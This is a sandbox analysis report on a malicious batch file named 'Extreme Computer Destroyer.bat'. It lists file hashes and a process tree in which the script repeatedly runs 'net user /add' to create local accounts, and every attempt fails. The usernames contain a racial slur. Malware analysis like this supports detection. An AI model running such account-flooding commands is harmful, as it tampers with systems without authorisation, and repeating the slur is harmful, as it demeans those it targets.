File name: | Extreme Computer Destroyer.bat |
Full analysis: | https://app.any.run/tasks/bd039383-5eb5-4fb9-9518-1edfe14beff8 |
Verdict: | Malicious activity |
Analysis date: | July 17, 2019, 16:27:13 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/x-msdos-batch |
File info: | DOS batch file, ASCII text, with CRLF line terminators |
MD5: | 1BC1F4A9D068889C2E1155C814C12D62 |
SHA1: | 89880BEE4DC7F98E15D50AA8365B93F5BCC5475E |
SHA256: | 52FE80541223D51DC06C3EFBFC61B3FA9067EE32164252E28A36424A0961290B |
SSDEEP: | 24:VTk+PQGqce6dLoM410fq6/X6sqYXyIGp5vqUXPEqYXzqZlXZRDCQvtz7sv05X6:Vg+PLReRKfxlVgh9/EtDgjDbZsv05q |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3876 | cmd /c ""C:\Users\admin\AppData\Local\Temp\Extreme Computer Destroyer.bat" " | C:\Windows\system32\cmd.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1228 | net user /add nigger24121 | C:\Windows\system32\net.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Net Command Exit code: 2 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2520 | C:\Windows\system32\net1 user /add nigger24121 | C:\Windows\system32\net1.exe | — | net.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Net Command Exit code: 2 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3720 | net user /add nigger29723 | C:\Windows\system32\net.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Net Command Exit code: 2 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3616 | C:\Windows\system32\net1 user /add nigger29723 | C:\Windows\system32\net1.exe | — | net.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Net Command Exit code: 2 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2132 | net user /add nigger19812 | C:\Windows\system32\net.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Net Command Exit code: 2 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3004 | C:\Windows\system32\net1 user /add nigger19812 | C:\Windows\system32\net1.exe | — | net.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Net Command Exit code: 2 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3140 | net user /add nigger32494 | C:\Windows\system32\net.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Net Command Exit code: 2 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3388 | C:\Windows\system32\net1 user /add nigger32494 | C:\Windows\system32\net1.exe | — | net.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Net Command Exit code: 2 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2356 | net user /add nigger18317 | C:\Windows\system32\net.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Net Command Exit code: 2 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |